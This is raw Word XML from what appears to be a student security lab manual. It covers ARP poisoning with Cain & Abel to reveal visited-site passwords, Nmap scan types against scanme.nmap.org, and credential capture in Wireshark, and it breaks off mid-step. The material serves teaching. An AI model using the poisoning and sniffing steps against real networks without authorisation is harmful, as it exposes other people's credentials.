        <w:t xml:space="preserve"> Click on “+” icon on the top. Click on ok.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520238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605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1925195" cy="3202305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="455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19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  <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId35"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="620" w:right="1040" w:bottom="1060" w:left="1220" w:header="0" w:footer="73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5B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>5 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Shows the Connected host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202483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57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6 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Select Arp at bottom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20258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574</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5925368" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="459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  <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId38"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1280" w:left="1220" w:header="0" w:footer="109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7 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on “+” icon at the top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20268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61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8 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Click on start/stop ARP icon on top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20279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74</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="463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rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId40"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1060" w:left="1220" w:header="0" w:footer="8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5B6F48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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3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9 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Poisoning the source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20289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65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10 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to any website on source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> address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20299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74</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5923788" cy="3189732"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="467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88" cy="3189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  <w:spacing w:line="289" w:lineRule="exact"/>
        <w:ind w:left="221"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:spacing w:line="289" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00CD2C75" w:rsidRPr="00D4195F">
          <w:footerReference w:type="default" r:id="rId43"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="280" w:left="1220" w:header="0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CD2C75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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75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CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9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11 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> Go to password option in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>cain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> &amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>abel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> and see the visited site password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2C75" w:rsidRPr="00D4195F" w:rsidRDefault="00CD2C75" w:rsidP="00CD2C75">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2520309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485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917350" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="469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D4195F" w:rsidRPr="00D4195F" w:rsidRDefault="00D4195F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5B6F48" w:rsidRPr="00A3347F" w:rsidRDefault="005B6F48" w:rsidP="005B6F48">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTICAL NO. 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B6F48" w:rsidRPr="00D4195F" w:rsidRDefault="005B6F48" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIM :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanner to perform port scanning of various forms – ACK, SYN, FIN, NULL, XMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:ind w:left="221"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for windows and install it. After that open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” to check if it is installed properly. Now type the below commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:jc w:val="center"/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 xml:space="preserve">ACK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F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D4195F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D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> (TCP ACK scan)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">It never determines open (or even </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>open|filtered</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">) ports. It is used to map out firewall rulesets, determining whether they are </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t>stateful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> or not and which ports are filtered.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="20078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left="941"/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SYN (Stealth) Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sS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left="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>SYN scan is the default and most popular scan option for good reason. It can be performed quickly, scanning thousands of ports per second on a fast network not hampered by intrusive firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText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p22,113,139 scanme.nmap.org</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="581"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="51149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D4195F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/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FIN Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sF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Sets just the TCP FIN bit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00947564" w:rsidRPr="00D4195F" w:rsidRDefault="00947564" w:rsidP="00947564">
      <w:pPr>
        <w:pStyle w:val="BodyText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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 para</w:t>
      </w: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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4295775" cy="2066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 xml:space="preserve">NULL Scan </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"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Does not set any bits (TCP flag header is 0)</w:t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–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> –p 22 scanme.nmap.org</w:t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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="13462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XMAS Scan (-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sX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Sets the FIN, PSH, and URG flags, lighting the packet up like a Christmas tree.</w:t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r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 scanme.nmap.org</w:t>
      </w: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  <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="441960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 w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="126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A3347F" w:rsidRDefault="005B6F48" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="7565"/>
          <w:tab w:val="left" w:pos="8937"/>
        </w:tabs>
        <w:spacing w:before="37"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3347F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PRACTCAL NO. 5</w:t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50"/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D4195F" w:rsidP="00D4195F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="0" w:right="-2673"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="005B6F48" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">.1) Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005B6F48" w:rsidRPr="00D4195F">
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005B6F48" w:rsidRPr="00D4195F">
        <w:t xml:space="preserve"> sniffer to capture network traffic and analyze.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">1: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">Install </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>WireShark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D4195F">
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4" w:rsidP="005B6F48">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="93"/>
        <w:ind w:left="0" w:right="4176"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidSect="00D4195F">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1240" w:left="12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7144" w:space="708"/>
            <w:col w:w="2128"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="00390B00">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="250"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5988177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="425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  <w:spacing w:before="3"/>
        <w:rPr>
          <w:b/>
        </w:rPr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2: Go to Capture tab and select Interface option.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251410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288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5881647" cy="2893695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="427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47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8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type w:val="continuous"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="680" w:right="1040" w:bottom="1240" w:left="12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>Step 3: In Capture interface, Select Local Area Connection and click on start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114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36728" cy="1645920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="429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2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90"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t>Step 4: The source, Destination and protocols of the packets in the LAN network are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514124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3844</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5917066" cy="3186112"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="431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066" cy="318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 w:rsidP="00E54A23">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:sectPr w:rsidR="00390B00" w:rsidRPr="00D4195F"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D03C4" w:rsidP="00E54A23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noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514135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88177" cy="3224403"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="433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1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5: Open a website in a new window and enter the user id and password. Register if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4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14145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48</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5928851" cy="3829050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="435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85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10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32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>Step 6: Enter the credentials and then sign in.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00390B00" w:rsidRPr="00D4195F" w:rsidRDefault="003D03C4">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="2514155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1986</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5947180" cy="3845052"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="437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1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180" cy="384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226"/>
        <w:ind w:left="221"/>
      </w:pPr>
      <w:r w:rsidRPr="00D4195F">
        <w:t xml:space="preserve">Step 7: The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D4195F">
